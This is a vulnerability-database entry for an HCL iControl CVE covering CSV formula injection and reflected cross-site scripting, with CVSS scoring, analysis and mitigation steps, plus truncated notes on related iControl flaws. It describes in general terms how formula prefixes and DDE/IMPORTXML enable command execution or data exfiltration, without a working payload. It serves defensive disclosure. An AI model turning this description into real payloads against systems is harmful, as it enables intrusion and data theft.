Severity by source
AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H
Primary rating from NVD · only source for this CVE.
CVSS VectorNVD
CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H
Lifecycle Timeline
1DescriptionCVE.org
HCL iControl was affected by Export CSV - CSV Injection vulnerability. It is vulnerable to a reflected cross-site scripting vulnerability. This was caused by an insufficient sanitation of input parameters. .
AnalysisAI
CSV injection and reflected cross-site scripting affect HCL iControl due to insufficient input sanitization in the Export CSV feature and reflected parameters. An attacker who can lure an authenticated user to click a crafted link can execute script in the victim's browser session or inject formula payloads into exported CSV files that execute when opened in spreadsheet applications. No public exploit identified at time of analysis; the issue carries a CVSS 7.1 (High) rating driven largely by user-interaction and low-privilege requirements.
Technical ContextAI
HCL iControl is HCL Software's IT operations and infrastructure control product. The CWE assigned is CWE-1236 (Improper Neutralization of Formula Elements in a CSV File), commonly called CSV injection or formula injection, in which user-controlled values written into CSV cells (e.g. starting with =, +, -, @) are interpreted as formulas by Excel/LibreOffice/Google Sheets when the export is opened, enabling command execution or data exfiltration via DDE/IMPORTXML. The vendor advisory also describes a parallel reflected XSS condition where input parameters echoed back into HTML responses are not encoded, letting attacker-controlled HTML/JavaScript execute in the browsing context of a victim. Both root causes stem from missing output-context-aware neutralization (HTML encoding for the web UI, formula prefixing/escaping for CSV cells).
RemediationAI
Apply the fixed release referenced in HCL's advisory at https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0131041 - exact fix version is not included in the supplied data and should be confirmed directly with HCL Support. Until the patch is deployed, restrict access to the iControl web interface to trusted administrative networks, instruct operators not to open exported CSV files in spreadsheet applications without first reviewing them in a plain-text viewer (trade-off: breaks normal reporting workflows), and enforce browser settings or a strict Content-Security-Policy at the reverse proxy to limit inline script execution as a partial XSS mitigation (trade-off: may break legitimate iControl UI features and requires testing). Disable or remove the CSV export functionality if it is not operationally required (trade-off: loss of reporting capability).
HCL iControl's web interface fails to automatically expire user sessions after inactivity, leaving authenticated session
Weak input validation in HCL iControl allows authenticated remote attackers to submit input of an unexpected type, resul
Missing HTTP security response headers in HCL iControl fail to instruct client browsers to engage their built-in XSS fil
Stack trace disclosure in HCL iControl v4.0.0 exposes internal application details to authenticated remote attackers via
HCL iControl exposes session cookies without the Secure or SameSite attributes set, and with the cookie path scoped to r
Share
External POC / Exploit Code
Leaving vuln.today
EUVD-2025-210058
GHSA-x53x-g43q-33f7